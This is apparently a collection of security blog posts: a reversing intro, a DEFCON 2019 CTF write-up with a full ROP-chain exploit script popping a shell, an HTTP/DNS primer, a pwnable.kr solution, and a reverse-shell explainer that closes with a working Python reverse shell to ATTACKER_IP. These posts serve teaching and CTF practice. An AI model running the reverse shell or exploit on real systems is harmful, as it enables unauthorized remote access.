Search This Blog

Monday, December 19, 2022

Beginner Reversing


Reversing is a fundamental skill that requires understanding various low level concepts, both to uncover vulnerabilities as well as reverse algorithms. Within my time learning reversing, I've had to adapt my mindset to reading various patterns that assist me when playing CTFs or when doing my own independent security research. In this blog post, I will go over basic reverse engineering concepts and the methodology of what goes into it.

When reverse engineering is basically the process of tearing down software or hardware and analyzing its functions and information so that its functionality and behaviour can be better understood. To even begin looking at reverse engineering, we have to look at the various methods that can go into reverse engineering.  

I'm not gonna go through the details of what and how a computer handles an executed program. That will be covered in a future post or a future tutorial which I will compile and go through in detail. I will go into reverse engineering a "hello world" program, compiled in x64, on my linux machine. 

Take a look at the code below:


This is a simple "hello_world" program written in C. It simply prints out "Hello World!" on the command line using the puts() function. Looking at this program, it doesn't really do much. Let's start by first compiling this code into a working executable program that we will execute on our command line as well as debug. This tutorial is compatible on a linux system. You can apply the reverse engineering knowledge to a windows machine but for the sake of compilation, it is only linux based.

Copy this code and save it as "hello_world.c". After you do this, you can then use "gcc" which is a linux based compiler which will compile C programs in the terminal. To compile your "hello_world.c" program, the command is as follows:

gcc hello_world.c -o hello_world

Now that you have compiled the program, now its time to look at the assembly code of this program.


The code above is the assembly code of the hello_world program. Okay???? so what???? Well... with languages like C and C++, the code that we actually write is not the one being executed. The code we write is actually sent to a compiler, and that compiler will then translate our code into assembly code, which is essentially the "real" code that is being ran by the processor. It will serve you will to understand how assembly code really works so you can thrive and actually succeed in reversing. 
With assembly code, there are lots of other architectures available for them. This one that you see above is x64. There are others like x86-64, x32, ARM, MIPS and others.

To begin reversing, we have to understand what Registers are:

Registers are simply locations that the processor can store memory. They're quite similar to variables. 
Below are a list of registers available in x64.

rax
rbx
rcx
rdx
rsi
rdi
r8
r9

This blog post will end there for now. In a future post, I will expound more on the different x64 registers and how they can greatly impact your reverse engineering projects and hacks.

Happy Hacking.






Saturday, May 7, 2022

Buffer Overflow to ROP Chain | speedrun-001 | DEFCON 2019 Quals pwn CTF challenge




Back with another binary exploitation challenge, and this time I decided to do the DEFCON 2019 CTF Qualifier challenge as, being in the Infosec community, I've never done any CTF hosted or provided by DEFCON. To those who have no clue what DEFCON is, DEFCON is a conference that has hackers and security researchers link up and host different talks that pertains to security as well as host different CTFs (both Jeopardy style and Attack-And-Defense). I'm not gonna dive into the history of DEFCON. To know more, click here.

Back to the challenge. This challenge basically exploits a buffer overflow vulnerability and upon exploitation, craft a ROP Chain which in turn executes '/bin/sh', which gets me a shell on the remote machine to get the flag. At the time of my writeup of this challenge, the target server has been shut down, so there is no remote server to connect to. However the binary executable has been provided so we can take on the challenge locally pop a shell.

Typically for these kind of hacking challenges, there are times when you're provided with the source and times when you're not. So some knowledge of programming (In C) and some reverse engineering is vital. Let's get to the challenge.

Challenge binary can be downloaded here

Let's run checksec on the binary to have a look at the security mechanisms enabled on it.

kaizen@kaizen-box:~/oooverflow# checksec speedrun-001
[*] '/home/kaizen/oooverflow/speedrun-001'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

RELRO (which is also Relocation Read Only) is partially enabled, which won't matter in our case because we have no need to overwrite any entry on the Global Offset Table. There's no Stack Canary found, which is good for us because if it we're to be enabled, any attempt to overflow anything on the stack will prove to be useless as the canary will pick up on us trying to overwrite other parts of memory and block us so... good stuff so far! NX, is enabled, which immediately stands out to me because since its enabled, we aren't able to inject any code and have it executed on the stack. PIE (Position Independant Executable) is off as well so that's pretty good.

Upon executing the binary, we see that the program awaits input from the user. If the user takes too long, the program triggers a SIGINT and exits. Since the program awaits input, let's have a look at if we have to send through a whole bunch of junk to trigger a 'segmentation fault' and see if the program is vulnerable to a buffer overflow vulnerability


kaizen@kaizen-box:~/oooverflow# python -c 'print ("A"*2000)' | ./speedrun-001 
Hello brave new challenger
Any last words?
This will be the last thing that you say: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)

Upon multiple attempts, we trigger a segmentation fault, indicating that we've triggered the buffer overflow. This lets us know that a gets() is being used. If you know anything about the buffer overflow vulnerability, the gets() function continues to store characters past the allocated buffer size, enabling an arbitrary write to other parts of memory. So let's have a look at gdb and see the how much we need to input to have control over the saved return address by generating a cyclic pattern of characters and using those characters to trigger another segmentation fault.

gef➤  r
Starting program: /home/kaizen/oooverflow/speedrun-001 
Hello brave new challenger
Any last words?
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaa...
This will be the last thing that you say: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaa...

[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x7fc             
$rbx   : 0x00000000400400  →   sub rsp, 0x8
$rcx   : 0x0               
$rdx   : 0x000000006bbd30  →   add BYTE PTR [rax], al
$rsp   : 0x007fffffffe4d8  →  "eaaaaaaffaaaaaafgaaaaaafhaaaaaafiaaaaaafjaaaaaafka[...]"
$rbp   : 0x6661616161616164 ("daaaaaaf"?)
$rsi   : 0x0               
$rdi   : 0x1               
$rip   : 0x00000000400bad  →   ret 
$r8    : 0x7fc             
$r9    : 0x7fc             
$r10   : 0xfffff82f        
$r11   : 0x246             
$r12   : 0x000000004019a0  →   push rbp
$r13   : 0x0               
$r14   : 0x000000006b9018  →  0x00000000440ea0  →   mov rcx, rsi
$r15   : 0x0               
$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00 
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0x007fffffffe4d8│+0x0000: "eaaaaaaffaaaaaafgaaaaaafhaaaaaafiaaaaaafjaaaaaafka[...]"	 ← $rsp
0x007fffffffe4e0│+0x0008: "faaaaaafgaaaaaafhaaaaaafiaaaaaafjaaaaaafkaaaaaafla[...]"
0x007fffffffe4e8│+0x0010: "gaaaaaafhaaaaaafiaaaaaafjaaaaaafkaaaaaaflaaaaaafma[...]"
0x007fffffffe4f0│+0x0018: "haaaaaafiaaaaaafjaaaaaafkaaaaaaflaaaaaafmaaaaaafna[...]"
0x007fffffffe4f8│+0x0020: "iaaaaaafjaaaaaafkaaaaaaflaaaaaafmaaaaaafnaaaaaafoa[...]"
0x007fffffffe500│+0x0028: "jaaaaaafkaaaaaaflaaaaaafmaaaaaafnaaaaaafoaaaaaafpa[...]"
0x007fffffffe508│+0x0030: "kaaaaaaflaaaaaafmaaaaaafnaaaaaafoaaaaaafpaaaaaafqa[...]"
0x007fffffffe510│+0x0038: "laaaaaafmaaaaaafnaaaaaafoaaaaaafpaaaaaafqaaaaaafra[...]"
────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x400ba6                  call   0x40f710
     0x400bab                  nop    
     0x400bac                  leave  
 →   0x400bad                  ret    
[!] Cannot disassemble from $PC
────────────────────────────────────────────────────────────────────────────────────────────────────────────────  threads ────
[#0] Id 1, Name: "speedrun-001", stopped 0x400bad in ?? (), reason: SIGSEGV
────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[#0] 0x400bad → ret 

gef➤  i f
Stack level 0, frame at 0x7fffffffe4d8:
 rip = 0x400bad; saved rip = 0x6661616161616165
 called by frame at 0x7fffffffe4e8
 Arglist at 0x7fffffffe4d0, args: 
 Locals at 0x7fffffffe4d0, Previous frame's sp is 0x7fffffffe4e0
 Saved registers:
  rip at 0x7fffffffe4d8

gef➤  pattern search "eaaaaaaf"
[+] Searching for 'eaaaaaaf'
[+] Found at offset 840 (little-endian search) likely

Upon looking at gdb, we trigger a seg fault, but this time with our generated pattern. The pattern allows us to identify where the saved return address is since we've overflowed the input buffer. It enabled us to know an accurate amount of input we will need from the beginning of the input itself until where the saved return address is in memory. Here we can see that the offset from the start of our input to the saved return address is 1032 bytes (0x6661616161616165 = eaaaaaaf). We'll take note of that.

Now that we have control over the return address, we need a way forward. There are no other functions to jump to within the executable. The next plan of action is to implement ROP Gadgets. I've explained ROP gadgets in the past and why they are used in the way they are. We can use ROP to jump to other places in memory. Using ROP here seems like the only option as the stack protection has been enabled. so Lets do that.

The Goal is to have an execve system call to execute /bin/sh. To do this, we will need to find these rop gadgets within the executable. To execute the execve, we will need to pop values to the execve syscall registers (rax, rdi, rdx and the rdi registers). For this, we can either use ROPgadget or ropper browse through the executable and show us the list of gadgets available in the executable. Since we are looking for gadgets that correspond with the parameters of the execve system call, we will 'grep' for 'pop rdx, rax, rdi, and rsi


$ ROPgadget --binary speedrun-001 | grep ": pop rdx ; ret" 
	0x00000000004498b5 : pop rdx ; ret
	0x000000000045fe71 : pop rdx ; retf
$ ROPgadget --binary speedrun-001 | grep ": pop rax ; ret" 
	0x0000000000415664 : pop rax ; ret
	0x000000000048cccb : pop rax ; ret 0x22
	0x00000000004a9323 : pop rax ; retf
$ ROPgadget --binary speedrun-001 | grep ": pop rdi ; ret" 
	0x0000000000400686 : pop rdi ; ret
$ ROPgadget --binary speedrun-001 | grep ": pop rsi ; ret" 
	0x00000000004101f3 : pop rsi ; ret
$ ROPgadget --binary speedrun-001 | grep syscall
	0x000000000040129c : syscall

In addition to finding these gadgets, we will need to find a place to place the string /bin/sh\x00 somewhere in memory as well as an address to write it to. Within the executable, we see that there is a mov instruction present which enables us to store a value at the memory address of the rax register. So we'll use that.


0x0000000000471bb4 : mov qword ptr [rax], rdx ; mov eax, esi ; jmp 0x471b97
0x00000000004114a4 : mov qword ptr [rax], rdx ; mov qword ptr [rax + 8], rdx ; jmp 0x410ff7
0x0000000000484ec0 : mov qword ptr [rax], rdx ; pop rbx ; ret

0x000000000048d251 : mov qword ptr [rax], rdx ; ret		// Found Gadget!

0x0000000000471e6b : mov qword ptr [rax], rdx ; xor eax, eax ; jmp 0x471e2f
0x0000000000471e2a : mov qword ptr [rax], rdx ; xor eax, eax ; ret
0x000000000048f939 : mov qword ptr [rbp + 0x10], rax ; jmp 0x48f86e
0x0000000000418ff8 : mov q

For the memory location, we see that the address 0x6b6000 will work for us since it is in the PIE segment so we know the address of it without an infoleak, and there doesn't appear to be anything stored at that address:


gef➤  vmmap
Start              End                Offset             Perm Path
0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/kaizen/Downloads/speedrun-001
0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kaizen/Downloads/speedrun-001
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
0x00007ffff7ffa000 0x00007ffff7ffd000 0x0000000000000000 r-- [vvar]
0x00007ffff7ffd000 0x00007ffff7fff000 0x0000000000000000 r-x [vdso]
0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
0xffffffffff600000 0xffffffffff601000 0x0000000000000000 r-x [vsyscall]
gef➤  x/4g 0x00000000006b6000
0x6b6000:	0x0	0x0
0x6b6010:	0x0	0x0

Lastly, we need the actual syscall...


0x0000000000475453 : sub esp, 8 ; syscall
0x0000000000475452 : sub rsp, 8 ; syscall

0x000000000040129c : syscall		// syscall found!

0x00000000004498a6 : test eax, eax ; jne 0x4498c0 ; xor eax, eax ; syscall
0x0000000000449976 : test eax, eax ; jne 0x449990 ; mov eax, 1 ; syscall
0x0000000000449ab3 : test eax, eax ; jne 0x449b18 ; mov eax, 0x48 ; syscall

With all this, it's safe to say that we have everything we need to build out the entire ROP Chain. For the execve syscall, it expects three arguments (in addition to 0x3b being in the rax register to specify we want an execve system call). In the rdi register, it expects a pointer to the filename to be executed, which is /bin/sh. In the rsi and rdx registers it will expect pointers to the arguments / enviornment variables for the process (for our purposes we don't need to worry about them, sow e can just set them equal to zero).

Our ROP chain will have the following instructions:


pop rdx, 0x0068732f6e69622f
pop rax, 0x6b6000
mov qword ptr [rax], rdx ; ret

pop rax, 0x3b
pop rdi, 0x6b6000
pop rsi, 0x0
pop rdx, 0x0

syscall

Upon all the analysis we've done on the executable, We finally have all we need. In a nutshell, we will exploit a buffer overflow vulnerability, build a ROP chain that will execute an execve syscall to /bin/sh. I've already writted out the final exploit.

Final Exploit

#!/sbin/python
from pwn import *
context.log_level = "DEBUG"
target = process('./speedrun-001')
#gdb.attach(target, gdbscript = 'b *0x400bad')
# Establish the pop ROP Gadgets
popRdx = p64(0x4498b5)
popRax = p64(0x415664)
popRsi = p64(0x4101f3)
popRdi = p64(0x400686)
# 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
writeGadget = p64(0x48d251)
# syscall
syscall = p64(0x40129c)
# payload from initial input to return address
payload = b"0"*1032
# Write '/bin/sh\x00' to '0x6b6000'
#pop rdx, 0x0068732f6e69622f
#pop rax, 0x6b6000
#mov qword ptr [rax], rdx ; ret
payload += popRdx
payload += p64(0x0068732f6e69622f)
payload += popRax
payload += p64(0x6b6000)
payload += writeGadget
# Setup args for syscall
# pop rax, 0x3b
payload += popRax
payload += p64(0x3b)
# pop rdi, 0x6b6000
payload += popRdi
payload += p64(0x6b6000)
# pop rsi, 0x0
# pop rdx, 0x0
payload += popRsi
payload += p64(0)
payload += popRdx
payload += p64(0)
# syscall
payload += syscall
# Send the payload
target.send(payload)
target.interactive()

Upon running the exploit...

kaizen@kaizen-box:~/oooverflow# ./exploit.py 
[+] Starting local process './speedrun-001' argv=[b'./speedrun-001'] : pid 3190
[DEBUG] Sent 0x478 bytes:
    00000000  30 30 30 30  30 30 30 30  30 30 30 30  30 30 30 30  │0000│0000│0000│0000│
    *
    00000400  30 30 30 30  30 30 30 30  b5 98 44 00  00 00 00 00  │0000│0000│··D·│····│
    00000410  2f 62 69 6e  2f 73 68 00  64 56 41 00  00 00 00 00  │/bin│/sh·│dVA·│····│
    00000420  00 60 6b 00  00 00 00 00  51 d2 48 00  00 00 00 00  │·`k·│····│Q·H·│····│
    00000430  64 56 41 00  00 00 00 00  3b 00 00 00  00 00 00 00  │dVA·│····│;···│····│
    00000440  86 06 40 00  00 00 00 00  00 60 6b 00  00 00 00 00  │··@·│····│·`k·│····│
    00000450  f3 01 41 00  00 00 00 00  00 00 00 00  00 00 00 00  │··A·│····│····│····│
    00000460  b5 98 44 00  00 00 00 00  00 00 00 00  00 00 00 00  │··D·│····│····│····│
    00000470  9c 12 40 00  00 00 00 00                            │··@·│····│
    00000478
[*] Switching to interactive mode
[DEBUG] Received 0x461 bytes:
    00000000  48 65 6c 6c  6f 20 62 72  61 76 65 20  6e 65 77 20  │Hell│o br│ave │new │
    00000010  63 68 61 6c  6c 65 6e 67  65 72 0a 41  6e 79 20 6c  │chal│leng│er·A│ny l│
    00000020  61 73 74 20  77 6f 72 64  73 3f 0a 54  68 69 73 20  │ast │word│s?·T│his │
    00000030  77 69 6c 6c  20 62 65 20  74 68 65 20  6c 61 73 74  │will│ be │the │last│
    00000040  20 74 68 69  6e 67 20 74  68 61 74 20  79 6f 75 20  │ thi│ng t│hat │you │
    00000050  73 61 79 3a  20 30 30 30  30 30 30 30  30 30 30 30  │say:│ 000│0000│0000│
    00000060  30 30 30 30  30 30 30 30  30 30 30 30  30 30 30 30  │0000│0000│0000│0000│
    *
    00000450  30 30 30 30  30 30 30 30  30 30 30 30  30 b5 98 44  │0000│0000│0000│0··D│
    00000460  0a                                                  │·│
    00000461
Hello brave new challenger
Any last words?
This will be the last thing that you say: 00000000000000000000000000000000000000000000000000000000000000000000000000000000000\xb5\x98D
$ id
[DEBUG] Sent 0x3 bytes:
    b'id\n'
[DEBUG] Received 0xb9 bytes:
    b'uid=1000(kaizen) gid=1001(kaizen) groups=1001(kaizen),3(sys),90(network),96(scanner),98(power),982(rfkill),984(users),985(video),987(storage),990(optical),991(lp),996(audio),998(wheel)\n'
uid=1000(kaizen) gid=1001(kaizen) groups=1001(kaizen),3(sys),90(network),96(scanner),98(power),982(rfkill),984(users),985(video),987(storage),990(optical),991(lp),996(audio),998(wheel)
[*] Got EOF while reading in interactive
$  

And just like that... WE POP A SHELL!! Challenge Complete.

Thursday, May 5, 2022

HTTP Basics

Hacking is a skillset built upon other skillsets. Its a culmination of various fields of IT. In this post, I want to diverge from the low level vulnerability exploitation and expound on one of the most important topics in IT, which are some basics on Networking, HTTP and web servers and how we can discover vulnerabilities within websites, in the next set of blog posts. The Internet has become an efficient medium of information and resource retrieval the world has ever known since inception. This has me giving a brief crash course of the basics of networking, specifically, the workings of the internet. Networking is at the core of the way the Internet works. Networks, in non-technical terms, are systems, devices and computers that are all able to communicate and request information and data amongst each other. Within this transfer of data, there are certain rules and regulations that these networks follow and adhere to as well as different data transfer mediums...but that's another rabbit hole for another post.

Within networking is a protocol that the web functions under, along with many other services other than the web. TCP, which is also, Transmission Communication Protocol is basically a network communication standard that allows for applications and computer devices to transfer data over a network. TCP is the standard protocol that other services such as FTP, SMB, SSH and other services use.

Whenever you browser to access the internet, you always use a browser. This "browser" is simply software catered to the average user to communicate over HTTP with servers connected all around the world and give you the flexibility and ability to request for various pieces of information and resources that you want. Understanding the core functionalities of the web will allow you to understand how the web vulns are found and how you can also find them out to. The browser is also known to be playing the role of the "client".

Every website you access online is hosted on a web server, also known as an HTTP Server. A "server" is simply a computer system or even hardware dedicated to providing a service, or a host of services for that matter. This "web server" is in charge of handling "client" based requests as well handles code and also hosts and keeps all these information and data or "web pages" in a form of files and are mostly handled by system administrators. To be more technical, HTTP (Hyper Text Transfer Protocol) is a protocol that is in charge of transferring hypermedia documents. If you know one or two things about websites, one of the things you're introduced to is the fact that websites are primarily coded in HTML, CSS and Javascript, but that's also out of scope.

HTTP, SMB, FTP and many other services are all data transfer protocols that are under the TCP/IP standard. HTTP, functions on port 80. So basically, the websites you access on your browser access websites over the port 80. Every service (which in total are 65335) all have a specific port assigned to it by default, but they can all be configured to other ports if needed. HTTP functions over port 80 by default, and is a request-response protocol. This means that as you use your browser to search for a resource such as "cat photos" on google, you are sending a "request" to where the "google.com" server. As a result, the "google.com" server will send a "response" to your web browser, which in this case, will be the cat photos you weirdly requested for lol.


kaizen@kaizen-box:~# curl -I http://kaizensec.blogspot.com
HTTP/1.1 301 Moved Permanently
Location: https://kaizensec.blogspot.com/
Content-Type: text/html; charset=UTF-8
Date: Thu, 05 May 2022 18:03:46 GMT
Expires: Thu, 05 May 2022 18:03:46 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Server: GSE
Transfer-Encoding: chunked
Accept-Ranges: none
Vary: Accept-Encoding


Under the hood of http requests sent to web servers for resource retrival, there are "request headers" sent to the web server that assist the server to know where the respective request is coming from such as the LOCATION of where the request is meant to go to, the content type CONTENT-TYPE of the request, which is typically going to be "text/html" along with other additional headers. The server sends back "response headers" which contain the 

Another component to the effective functioning of the web is DNS. Networks are comprised of different devices connected to each other with the ability to transfer data. How does a computer device know where to send data to? It is done by the use of IP Addresses. IP Addresses, specifically, IPV4, are 32bit octets that allows devices to be identified for the purpose of data transfer over a network.

                                      ##### Example Of An IP Address ##### 

                                              10 . 10 . 17 . 28 

I can be about 90% certain that you've seen these before. The remaining 10% is just in case you haven't. There are quite a bit to what pertains to IP Addresses, such as subnetting and the different IP Classes but that will be for another deeper post on Networking.

The miracle of DNS is that, we have millions of servers all around the world that are all hosting web sites and other additional services. Imagine if we had to remember IP Addresses in order for us to access websites. Our human brain will give up eventually on retaining such a plethora of information or rather, more of a major incovenience. Instead DNS was created, which is also known as Domain Name System. It's essentially a protocol under TCP/IP that resolves IP Addresses to Domain Names. Consider the following:


kaizen@kaizen-box:~# host kaizensec.blogspot.com
kaizensec.blogspot.com is an alias for blogspot.l.googleusercontent.com.
blogspot.l.googleusercontent.com has address 216.58.223.129
blogspot.l.googleusercontent.com has IPv6 address 2c0f:fb50:4002:800::2001


The host utility on my local machine allows users/sysadmins/hackers to be able to identify the IPV4 and IPV6 addresses of various domains. This blog has a domain name called 'kaizensec.blogspot.com' and the IP Address of this domain is 216.58.223.129. A Domain Name allows us humans to be able to remember these sites in order for us to access them later on, rather than remembering IP Addresses. DNS servers are the servers responsible for resolving these IP Addresses to their respective Domain Names.

This is a brief intro to HTTP, how websites work, what servers are and how they work as well as how DNS assist the whole process to be much more easier than what it could've been. Consider this a crash course on how you can better understand how HTTP works and how the internet works, in a nutshell. As you've probably noticed, if you wish to be proficient in hacking or even thrive in the IT industry, this knowledge is but a pre requisite because almost everything runs through networking. Let's just say the benefit is that you use networking on a daily basis so at least you got some points under your belt (unless you're from a parallel universe where we're still in the stone ages... if that's the case then I dont know what to tell you). At least now you have a higher view of how the internet works. Note that there are more detailed technicalities of how all these play out but this is enough for you to build a base for more advanced topics. I probably missed out a couple of things but for the most part, this seems to cover enough for the absolute beginner to grab a hold of and understand at a fundamental level.

Monday, April 25, 2022

fd - pwnable.kr (file descriptors & read() function) | pwn



CHALLENGE DESCRIPTION:

Mommy! what is a file descriptor in Linux?

* try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link:
https://youtu.be/971eZhMHQQw

ssh fd@pwnable.kr -p2222 (pw:guest)

This is my writeup for an easy pwn challenge that has to do with file descriptors and the read() function. using the SSH creds given, we log onto the server and we list the files in the current directory to see an executable file, the source code to the executable as well as the flag, owned by root, which stops us from cheating. The challenge needs to be complete to read the flag. Let's see the files provided to complete the challenge. play the wargame here.

fd@pwnable:~$ ls
fd  fd.c  flag

Let's see more about the fd executable file....

fd@pwnable:~$ file fd
fd: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2,
for GNU/Linux 2.6.24 BuildID[sha1]=c5ecc1690866b3bb085d59e87aad26a1e386aaeb, not stripped

Turns out the challenge is a 32bit ELF file, dynamically linked, meaning that it has libc libraries it refers to when executing built-in C functions like printf() and system() functions and its not stripped, which makes it easy to reverse engineer if it ever comes to that. Let's open the fd.c file to see how the program is written to analyze the code.

fd@pwnable:~$ cat fd.c
#include stdio.h
#include stdlib.h
#include string.h
char buf[32];
int main(int argc, char* argv[], char* envp[]){
        if(argc < 2){
                printf("pass argv[1] a number\n");
                return 0;
        }
        int fd = atoi( argv[1] ) - 0x1234;
        int len = 0;
        len = read(fd, buf, 32);
        if(!strcmp("LETMEWIN\n", buf)){
                printf("good job :)\n");
                system("/bin/cat flag");
                exit(0);
        }
        printf("learn about Linux file IO\n");
        return 0;

}

The goal is for the system("/bin/cat flag") to be executed to complete the challenge. For this to happen, we have to do some analysis on the code prior to this in order to see how we can achieve this. the source reveals a main() function which firstly checks if the command line arguments are two. if not it prints "pass argv[1] a number". If the arguments are two, it then goes forward to take the command line argument and passes it into the atoi() function which turns an ascii character to an integer. The next two lines show the 'len' variable contain zero. The next line pretty much shows the read() function at play. Looking into the manpages, we see the description of the function of the read() function

"The read() function shall attempt to read nbyte bytes from the file associated with the open file descriptor, 
fildes, into the buffer pointed to by buf"

Linux File descriptors are as follows:

0: stdin
1: stdout
2: stderr

This indicates that if we can get the fd = 0, the program will take input from stdin, then we can go on and input 'LETMEWIN' since there is a strcmp() function which compares the input places in buf with the string 'LETMEWIN'. The fd variable will take our command line argument and subtract it by 0x1234, which is 4660 in ascii text. To exploit this, we simply execute the fd binary and insert 4660 as a command line argument and after input the 'LETMEWIN' string in order for the strcmp() function check to evaluate to "True" (meaning the program must see that the string we put in and the string our input is compared to by the program evaluates to true so that the system() function executes the "/bin/cat flag" gets executed for the flag to be captured.

fd@pwnable:~$ ./fd 4660
LETMEWIN
good job :)
mommy! I think I know what a file descriptor is!!

Challenge completed! 

Flag: mommy! I think I know what a file descriptor is!!

Friday, April 15, 2022

Reverse Shells

Most linux administrators and even attackers have knowledge on how to navigate the command line, both in Windows and Linux systems. With respects to having to navigate file systems and look around a computer without the graphical user interface, we are used to, we make use of what we call a terminal. Most hackers who are proficient with linux mostly use the terminal to complete much more complicated tasks that the graphical user interface simply can't use. When an attacker has successfully enumerated and investigated the target system within the target network and finally needs the unauthorized remote access within the network, a reverse shell is simply what is used. A Reverse Shell, most technically referred to as a TCP Reverse Shell, is a program that opens a command shell such as sh or bash on a compromised system then connects back to an attacker-specified system to allow the attacker remote access of the command shell. 

Typically within networks, firewalls are put in place to prevent any incoming connections that will be coming from outside the respective network. For a normal shell session, the machine controlled by the attacker will actively have to connect to the victim machine within the target network... however the probability of this happening is very slim as the attacker is well aware that this will prove to be useless. An attacker has to ensure that his or her work to gain unauthorized access is as stealthy as possible. In modern networks that have firewalls in place to reject incoming traffic into the network and Intrusion Detection Systems, meant to pick up on any malicious activity will be able to see what is happening under the hood and detect that an attacker might be actively trying to establish a remote connection by directly connecting to the target. Instead of this happening, an attacker will instead investigate the target and find a means to gain unauthorized access to the network either via phishing attempts or vulnerability exploitation. When attempting to compromise a target system, an attacker may try to exploit a command injection vulnerability on the server system. The injected code will often be a reverse shell script to provide a convenient command shell for further malicious activities. This reverse shell will then cause the target system or server to connect to the attacker machine instead and establish a shell, thus bypassing firewall and IDS detection.

Below is an example of a reverse shell code written in python. This is done this way because when exploiting a vulnerability like command injection, this type of code would be inserted to allow the system to execute this code. This would then initialize the reverse shell so the target server will connect to the attacker controlled machine, essentially giving the attacker remote access. I would like to explain the vital parts of the code code below for the beginners or the curious.

user@kaizen:~$ cat revshell.py

import socket
import subprocess
import os

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("ATTACKER_IP",ATTACKER_PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);

